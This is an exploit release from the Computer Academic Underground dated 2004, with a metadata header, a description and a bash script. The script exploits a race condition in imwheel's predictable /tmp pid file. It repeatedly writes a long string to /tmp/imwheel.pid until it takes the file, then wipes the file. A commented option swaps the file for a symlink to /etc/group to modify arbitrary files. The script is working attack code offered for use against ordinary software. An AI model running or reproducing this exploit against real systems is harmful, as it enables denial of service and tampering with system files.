____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2004-0001
Release Date:   2004.06.24
Title:          imwheel-ratrace.sh
Description:    imwheel Predictable PidFile Takeover
Tested:         imwheel 1.0.0pre11
Attributes:     Denial of Service, Resource Exhaustion, Arbitrary File
                Modification
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2004-0001.txt
Author/Email:   I)ruid <druid@caughq.org>
===============/========================================================

Description
===========

This exploit continually attempts to write $CHARCOUNT characters
to imwheel's known pid filename.  When imwheel removes the file
and the write succeeds, the script has taken control of the pid
file.  It then waits for imwhell to write it's pid to the file
and wipes the file's contents, as well as optionally replaces
the pid file with a symlink to an arbitrary file.


References
==========

http://www.caughq.org/advisories/CAU-2004-0002.txt
IMWheel - http://imwheel.sourceforge.net/


Exploit
=======

#!/bin/bash

#
#  imwheel-ratrace.sh - I)ruid [CAU] (06.2004)
#
#  Exploits a race condition in imwheel's use of a pid file to
#  cause resource exhaustion or write information to an arbitrary
#  file.
#
 
# you may have to adjust the number of characters in the print to
# get the timing correct for the injection.  Fewer characters seems
# to prevent this from working.  Optionally, replacing the echo
# with the symlink creation at the end of this script seems to work
# fairly regularly.
CHARCOUNT=4000
 
echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
while [[ $? != 0 ]]; do
        echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
done
 
# Wait for imwheel to write it's pid to the new file
sleep 1
# Wipe the contents of the PID file.
echo > /tmp/imwheel.pid

# Optionally, replace the new file with a link
# rm /tmp/imwheel.pid
# ln -s /etc/group /tmp/imwheel.pid
 
echo "Exploit Successful!!!"